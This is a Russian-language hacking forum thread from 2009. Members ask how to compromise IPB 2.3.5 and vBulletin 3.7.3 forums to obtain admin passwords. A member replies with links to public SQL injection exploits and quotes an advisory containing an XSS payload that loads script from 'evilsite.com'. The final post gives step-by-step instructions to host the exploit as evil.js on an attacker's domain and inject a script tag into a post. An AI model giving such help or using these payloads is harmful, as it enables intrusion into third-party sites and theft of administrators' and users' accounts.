Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

13.02.2009, 08:42
|
|
Banned
Регистрация: 12.02.2009
Сообщений: 73
Провел на форуме: 175651
Репутация:
171
|
|
точно немогу сказать, так как не пользовал мубэбэ, но посмотри алгоритм создания куки, возможно есть вариант подделать
|
|
|

16.02.2009, 02:54
|
|
Новичок
Регистрация: 06.02.2009
Сообщений: 3
Провел на форуме: 3377
Репутация:
0
|
|
Народ подскажите пожалуйста как взломать форум IPB 2.3.5?
Нужно узнать пароль админа
|
|
|

16.02.2009, 08:21
|
|
Banned
Регистрация: 12.02.2009
Сообщений: 73
Провел на форуме: 175651
Репутация:
171
|
|
Сообщение от Tepp
Народ подскажите пожалуйста как взломать форум IPB 2.3.5?
Нужно узнать пароль админа
http://milw0rm.com/exploits/6507 <= 2.3.5 Remote SQL Injection Exploit
http://milw0rm.com/exploits/6325 <= 2.3.5 Multiple Vulnerabilities Exploit (revised)
Последний раз редактировалось it's mу; 16.02.2009 в 08:31..
|
|
|

17.02.2009, 19:42
|
|
Участник форума
Регистрация: 09.12.2008
Сообщений: 159
Провел на форуме: 2144019
Репутация:
214
|
|
Нужно узнать пароль админа! двиг булка 3.7.3 .
PS: C меня плюсы 
PSS: папка install не удалена! Мало ли...
Последний раз редактировалось 1ce666; 17.02.2009 в 19:56..
|
|
|

18.02.2009, 05:05
|
|
Banned
Регистрация: 12.02.2009
Сообщений: 73
Провел на форуме: 175651
Репутация:
171
|
|
Сообщение от 1ce666
Нужно узнать пароль админа! двиг булка 3.7.3 .
PS: C меня плюсы 
PSS: папка install не удалена! Мало ли...
http://www.hackzone.ru/exploit/view/id/3249/
|
|
|

18.02.2009, 12:32
|
|
Участник форума
Регистрация: 09.12.2008
Сообщений: 159
Провел на форуме: 2144019
Репутация:
214
|
|
Сообщение от it's mу
http://www.hackzone.ru/exploit/view/id/3249/
А как пользоваться? Я новичёк в этом и нужно учиться 
|
|
|

18.02.2009, 12:38
|
|
Banned
Регистрация: 12.02.2009
Сообщений: 73
Провел на форуме: 175651
Репутация:
171
|
|
Сообщение от 1ce666
А как пользоваться? Я новичёк в этом и нужно учиться 
:/ там есть описание:
Description = A critical vulnerability exists in the new vBulletin 3.7.3 software which comes included
with the visitor messages addon (a clone of a social network wall/comment area).
When posting XSS, the data is run through htmlentities(); before being displayed
to the general public/forum members. However, when posting a new message,
a new notification is sent to the commentee. The commenter posts a XSS vector such as
<script src="http://evilsite.com/nbd.js">, and when the commentee visits usercp.php
under the domain, they are hit with an unfiltered xss attach. XSRF is also readily available
and I have included an example worm that makes the user post a new thread with your own
specified subject and message.
|
|
|

18.02.2009, 01:18
|
|
Участник форума
Регистрация: 09.12.2008
Сообщений: 159
Провел на форуме: 2144019
Репутация:
214
|
|
И как раскрыть путь в булке 3.7.3 ?
|
|
|

18.02.2009, 12:41
|
|
Участник форума
Регистрация: 09.12.2008
Сообщений: 159
Провел на форуме: 2144019
Репутация:
214
|
|
- Описание = критическая уязвимость существует в новых Справка 3.7.3 программное обеспечение, которое поставляется включен
с посетителем сообщений аддон (клон социальной сети стены / комментарий область).
При публикации XSS, данные проходят через htmlentities (); затем отображается
для широкой публики / участники форума. Однако, при отправке нового сообщения
новое уведомление направляется commentee. Комментатор должности XSS вектор таких, как
<script src="http://evilsite.com/nbd.js">, и когда commentee посещений usercp.php
в рамках домена, они били нефильтрованное XSS приложу. XSRF также легко доступны
и я включил пример червя, что позволяет пользователю создать новое нить с вашими собственными
указанной темы и сообщения.
Вот какой перевод получился , обьясни в крадце пожалуйста 
C меня плюсы 
|
|
|

18.02.2009, 12:45
|
|
Banned
Регистрация: 12.02.2009
Сообщений: 73
Провел на форуме: 175651
Репутация:
171
|
|
пихаешь сплоит в evil.js и льешь к себе на hack.com пишешь пост и цепляешь яваскрипт <script src=http://hack.com/evil.js>
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|